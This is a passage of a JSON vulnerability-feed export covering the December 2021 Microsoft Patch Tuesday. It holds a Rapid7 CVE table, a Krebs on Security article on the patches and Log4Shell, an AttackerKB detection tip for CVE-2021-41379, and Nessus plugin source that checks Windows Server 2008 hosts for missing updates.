Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43247](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43247>) | Windows TCP/IP Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43237](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43237>) | Windows Setup Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43239](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43239>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-43231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43231>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43880>) | Windows Mobile Device Management Elevation of Privilege Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-43244](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43244>) | Windows Kernel Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-43246](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43246>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 5.6 | No \n[CVE-2021-43232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43232>) | Windows Event Tracing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43248>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43214>) | Web Media Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes 
\n[CVE-2021-43243](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43243>) | VP9 Video Extensions Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43228](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43228>) | SymCrypt Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-43227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43227>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43235](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43235>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43240](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43240>) | NTFS Set Short Name Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-40452](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40452>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40453>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-41360](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41360>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-43219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43219>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 7.4 | No \n \n### Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-43215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43215>) | iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution | No | No | 9.8 | Yes \n[CVE-2021-43238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43238>) | Windows Remote Access Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43223>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41333](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41333>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-43229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43229>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43230>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40441>) | Windows Media Center Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43883>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-43234](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43234>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43217](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43217>) | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability | No | No | 8.1 | Yes 
\n[CVE-2021-43893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43893>) | Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability | No | Yes | 7.5 | No \n[CVE-2021-43245](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43245>) | Windows Digital TV Tuner Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43224](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43224>) | Windows Common Log File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43226>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43207>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43233](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43233>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-43222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43222>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-43236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43236>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-43216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43216>) | Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability | No | No | 6.5 | Yes", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:12:53", "type": "rapid7blog", "title": "Patch Tuesday - December 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40441", "CVE-2021-40452", "CVE-2021-40453", "CVE-2021-4052", "CVE-2021-4053", "CVE-2021-4054", "CVE-2021-4055", "CVE-2021-4056", "CVE-2021-4057", "CVE-2021-4058", "CVE-2021-4059", "CVE-2021-4061", "CVE-2021-4062", "CVE-2021-4063", "CVE-2021-4064", "CVE-2021-4065", "CVE-2021-4066", "CVE-2021-4067", "CVE-2021-4068", "CVE-2021-41333", "CVE-2021-41360", "CVE-2021-41365", "CVE-2021-41379", "CVE-2021-42293", "CVE-2021-42294", "CVE-2021-42295", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-42311", "CVE-2021-42312", "CVE-2021-42313", "CVE-2021-42314", "CVE-2021-42315", "CVE-2021-42320", "CVE-2021-43207", "CVE-2021-43214", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43225", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43242", "CVE-2021-43243", "CVE-2021-43244", "CVE-2021-43245", "CVE-2021-43246", 
"CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43255", "CVE-2021-43256", "CVE-2021-43875", "CVE-2021-43877", "CVE-2021-43880", "CVE-2021-43882", "CVE-2021-43883", "CVE-2021-43888", "CVE-2021-43889", "CVE-2021-43890", "CVE-2021-43891", "CVE-2021-43892", "CVE-2021-43893", "CVE-2021-43896", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907", "CVE-2021-43908", "CVE-2021-44228"], "modified": "2021-12-14T22:12:53", "id": "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "href": "https://blog.rapid7.com/2021/12/14/patch-tuesday-december-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-12-23T19:27:26", "description": "**Microsoft**, **Adobe**, and **Google** all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month's Patch Tuesday is overshadowed by the "**Log4Shell**" 0-day exploit in a popular **Java** library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.\n\n\n\nLog4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called "**log4j**," which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.\n\nAccording to researchers at **Lunasec**, many, many services are vulnerable to this exploit.\n\n"Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable," Lunasec [wrote](<https://www.lunasec.io/docs/blog/log4j-zero-day/>). "Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. 
An extensive list of responses from impacted organizations has been compiled [here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>)."\n\n"If you run a server built on open-source software, there\u2019s a good chance you are impacted by this vulnerability," said **Dustin Childs** of Trend Micro's Zero Day Initiative. "Check with all the vendors in your enterprise to see if they are impacted and what patches are available."\n\nPart of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said **Johannes Ullrich**, an incident handler and blogger for the **SANS Internet Storm Center**. "Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon," Ullrich said. "Treat it as such." SANS has [a good walk-through](<https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/>) of how simple yet powerful the exploit can be.\n\n**John Hultquist**, vice president of intelligence analysis at **Mandiant**, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.\n\n"We anticipate other state actors are doing so as well, or preparing to," Hultquist said. "We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. 
In other cases, desirable targets may be selected after broad targeting."\n\nResearcher **Kevin Beaumont** had a more lighthearted take on Log4Shell [via Twitter](<https://twitter.com/GossiTheDog/status/1470787395805192199>):\n\n"Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly."\n\nThe** Cybersecurity and Infrastructure Security Agency** (CISA) has joined with the **FBI**, **National Security Agency** (NSA) and partners abroad in publishing [an advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>) to help organizations mitigate Log4Shell and other Log4j-related vulnerabilities.\n\nA half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire "critical" rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.\n\nThe Windows flaw already seeing active exploitation is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), which is a "spoofing" bug in the **Windows AppX installer** on **Windows 10.** Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like [Emotet](<https://krebsonsecurity.com/?s=Emotet>), [Trickbot](<https://krebsonsecurity.com/?s=trickbot>), and [BazaLoader](<https://www.proofpoint.com/us/blog/threat-insight/bazaflix-bazaloader-fakes-movie-streaming-service>).\n\n**Kevin Breen**, director of threat research for Immersive Labs, said [CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>) stands out of this month's patch batch.\n\n"Not only for its high [CVSS 
score](<https://www.techtarget.com/searchsecurity/definition/CVSS-Common-Vulnerability-Scoring-System>) of 9.6, but also because it\u2019s noted as 'exploitation more likely'," Breen observed.\n\nMicrosoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), an elevation of privilege vulnerability in Windows Installer.\n\n"This appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November," **Satnam Narang** of Tenable points out. "However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month."\n\nGoogle issued five security fixes for **Chrome**, including one rated critical and three others with high severity. If you\u2019re browsing with Chrome, keep a lookout for when you see an \u201cUpdate\u201d tab appear to the right of the address bar. If it\u2019s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.\n\nAlso, Adobe issued patches to correct more than 60 security flaws in [a slew of products,](<https://helpx.adobe.com/security.html>) including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.\n\nStandard disclaimer: Before you update Windows, _please_ make sure you have backed up your system and/or important files. 
It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.\n\nAdditional reading:\n\n[SANS ISC listing](<https://isc.sans.edu/forums/diary/Microsoft+December+2021+Patch+Tuesday/28132/>) of each Microsoft vulnerability patched today, indexed by severity and affected component.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T22:23:44", "type": "krebs", "title": "Microsoft Patch Tuesday, December 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43905"], "modified": "2021-12-14T22:23:44", "id": "KREBS:4CBEC9501222521F7CCF1D5ECAD51297", "href": "https://krebsonsecurity.com/2021/12/microsoft-patch-tuesday-december-2021-edition/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-05-13T17:54:15", "description": "Windows Installer Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at November 22, 2021 3:59pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\n**jbaines-r7** at December 03, 2021 7:27pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\n**gwillcox-r7** at November 24, 2021 9:16pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 
\n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-41379", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-41739", "CVE-2021-41773", "CVE-2021-43883"], "modified": "2021-12-17T00:00:00", "id": "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73", "href": "https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-05-24T15:40:55", "description": "The remote Windows host is missing security update 5007246 or cumulative update 5007263. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007246: Windows Server 2008 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007246.NASL", "href": "https://www.tenable.com/plugins/nessus/154983", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154983);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38666\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007246\");\n script_xref(name:\"MSKB\", value:\"5007263\");\n script_xref(name:\"MSFT\", value:\"MS21-5007246\");\n script_xref(name:\"MSFT\", value:\"MS21-5007263\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007246: Windows Server 2008 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007246\nor cumulative update 5007263. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377,\n CVE-2021-41379, CVE-2021-42278, CVE-2021-42282,\n CVE-2021-42283, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007246\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007246 or Cumulative Update KB5007263.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-38666\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007246', '5007263');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007246, 5007263])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:40:56", "description": "The remote Windows host is missing security update 5007233 or cumulative update 5007236. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007233: Windows Server 2008 R2 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007233.NASL", "href": "https://www.tenable.com/plugins/nessus/154984", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
